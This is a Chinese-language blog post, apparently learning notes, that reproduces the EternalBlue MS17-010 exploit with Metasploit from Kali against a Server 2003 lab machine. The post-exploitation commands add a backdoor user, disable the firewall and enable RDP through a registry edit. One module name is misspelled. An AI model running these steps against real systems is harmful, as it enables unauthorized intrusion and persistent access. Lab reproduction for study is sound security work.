ms17永恒之蓝漏洞复现全过程(kali-server2003)

本文为学习笔记,仅限学习交流。
不得利用、从事危害国家或人民安全、荣誉和利益等活动。
请参阅《中华人民共和国网络安全法》

永恒之蓝是利用Windows操作系统445端口存在的漏洞进行传播,并具有自我复制、主动传播的特性。
基于Windows网络共享协议进行攻击传播的蠕虫恶意代码

流程简介:1、启动:msfconsole
2、查看可测试漏洞模块:search ms17
3、使用模块进行测试:use +模块名称
4、添加IP:set rhost ip (查看模块架构:show options)
5、测试:exploit (或 run)
拿到权限:shell

一、测试准备:
目标机:server 2003
攻击机:kali

利用Nmap扫描IP ,查看已开启端口
发现445端口,尝试进行渗透测试:

ms17永恒之蓝漏洞复现全过程(kali-server2003)_第1张图片
二、漏洞测试

1、启动 msfconsole 命令:msfconsole
(重启数据库 命令:service postgresql start)

ms17永恒之蓝漏洞复现全过程(kali-server2003)_第2张图片

2、查看合适测试这个漏洞的模块
命令:search ms17

ms17永恒之蓝漏洞复现全过程(kali-server2003)_第3张图片
扫描模块查看是否存在永恒之蓝漏洞
命令:use auxiliary/scanner/smb/smb_ms17_010
ms17永恒之蓝漏洞复现全过程(kali-server2003)_第4张图片
在这里插入图片描述

3、使用模块进行测试 use + 模块名称 (最后一个)
命令:use exploit/windows/smb/ms17_010_psesec

查看攻击模块框架:
命令: show options

ms17永恒之蓝漏洞复现全过程(kali-server2003)_第5张图片

4、set rhost 添加目标IP
命令:set rhost 192.168.0.13

在这里插入图片描述
ms17永恒之蓝漏洞复现全过程(kali-server2003)_第6张图片

5、 exploit 开始进行测试
命令: exploit

ms17永恒之蓝漏洞复现全过程(kali-server2003)_第7张图片
成功拿到权限
ms17永恒之蓝漏洞复现全过程(kali-server2003)_第8张图片

三、Kali操控server 2003

1、添加用户net user 用户名 密码 /add
命令:net user amy 123456 /add

(添加用户到组:net localgroup “power user” 用户名 /add)

ms17永恒之蓝漏洞复现全过程(kali-server2003)_第9张图片

查看本地用户信息:
命令: Net user
确认添加成功

ms17永恒之蓝漏洞复现全过程(kali-server2003)_第10张图片
2、关闭防火墙
命令:netsh firewall set opmode mode=disable
ms17永恒之蓝漏洞复现全过程(kali-server2003)_第11张图片
查看防火墙状态:
netsh firewall show state
ms17永恒之蓝漏洞复现全过程(kali-server2003)_第12张图片

3、查看开启的端口
命令:netstat -ano

ms17永恒之蓝漏洞复现全过程(kali-server2003)_第13张图片
开启3389端口
命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

查看 3389 端口
命令:netstat -aon |findstr “3389”

ms17永恒之蓝漏洞复现全过程(kali-server2003)_第14张图片

四、server 2003验证

ms17永恒之蓝漏洞复现全过程(kali-server2003)_第15张图片
ms17永恒之蓝漏洞复现全过程(kali-server2003)_第16张图片

第五、远程连接

本机左下角——搜索远程桌面连接——打开——输入 目标IP——输入账户名和密码

ms17永恒之蓝漏洞复现全过程(kali-server2003)_第17张图片

前面创建过的:用户名&密码
连接成功!
ms17永恒之蓝漏洞复现全过程(kali-server2003)_第18张图片

找到用户桌面
添加文件在桌面

ms17永恒之蓝漏洞复现全过程(kali-server2003)_第19张图片

End!

你可能感兴趣的:(漏洞复现)